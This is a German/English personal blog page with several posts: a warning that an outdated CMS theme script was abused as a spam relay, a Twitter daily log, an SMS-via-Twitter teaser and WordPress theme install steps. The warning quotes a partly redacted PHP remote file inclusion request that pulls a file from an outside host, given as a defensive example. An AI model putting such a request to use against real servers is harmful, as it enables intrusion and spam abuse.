Vorsicht: Alte Scripte als Spamschleuder

Lücken in alten oder veralteten Scripts können zum Versenden von Spam durch Dritte unter eurer Domain verwendet werden – so geschehen vor ein paar Tagen bei Nils.

Die betreffende Datei war Teil eines CMS-Themes und wurde zwischenzeitlich sicher von den Machern geupdatet, lag aber eben noch (eigentlich ungenutzt) in einer alten Version auf dem Server. Mit [...]/advanced2.php?pluginpath[0]=http://www.[...].net/mega/info.txt? wurde eine externe Datei eingebunden, also eine klassische PHP Remote File Include Vulnerability.
Also unbedingt dafür sorgen dass eure Scripte auf dem aktuellsten Stand sind oder ihr ungenutzte alte Sachen löscht – auch wenn das Arbeit macht – denn ihr haftet dafür was auf euren Servern passiert.

Das war mein 26.03.2007

  • Der Tag beginnt mit Amoroy mild :-) #
  • Was schönes für Twitter und MacOS: Twitterrific! http://tinyurl.com/2af8lc #
  • Mal schön draussen hier mit Sonne, Billy Joel und Terry Pratchett #
  • Yahoo! Pipes, die Twitter API, PHP und ein Cronjob: Alle News auf’s Handy. Überall. Yea. #
  • Ein bisschen später als gedacht: Kathi beim Umziehen helfen. (Küche und so, das mit der Kleidung schafft sie alleine :-) ) #
  • Die Küche ist drin – auf nach Stammheim wo wir uns 1a Caro-Support gesichert haben :-) #
  • Was zählt ist im Treppenhaus! (Besonders wenn mit ohne Aufzug im 3. Stock…) Auch ohne Caro-Support sind wir jetzt auf der Rückfahrt #
  • Ausnahmsweise mal weg zu Dr. Psycho, Switch und Stromberg. #
  • Okay, Dr. Psycho kann man getrost streichen – Ulmen mit Laiendarstellern KANN mit verstecken Kameras ja lustig sein, aber SO… #

Einen SMS-Verteiler mit Twitter einrichten

Wie ja schon von mir bemerkt, lassen sich mit Twitter kostenlose SMS versenden.
Aber warum nicht einen Schritt weitergehen und einen SMS-Verteiler mit Twitter einrichten? Das kann z.B. für Teams (Terminbekanntgaben etc.) sehr interessant sein.
Continue reading

2813 widgetized

Info / Update:
As widgets are integrated in WordPress 2.2, I’ve updated this theme which should fix all the problems mentioned in the comments.

I took Eli’s great adoption 2813 of Paul and Neil‘s 281, added the widgets and Chris option to display posts from all categories on the frontpage.

2831 widgetized

1. Download 2813 widgetized, unzip and upload it to your WordPress theme-folder.
Please be patient, I’ll release a new version of my adoption in late september.

2. Download the widgets-plugin, upload and activate it.
(Widgets are now included in WordPress.)

3. Open home.php under themes/2813widgetized/ and look for showposts=3 on line 4 – change the “3″ to the number of posts you want to display on the frontpage.

4. Start to add widgets from the Presentation (or “Themes” when using a lokalized WordPress) tab.

5. You’re done.


Please be patient, I’ll release a new version of my adoption in late september.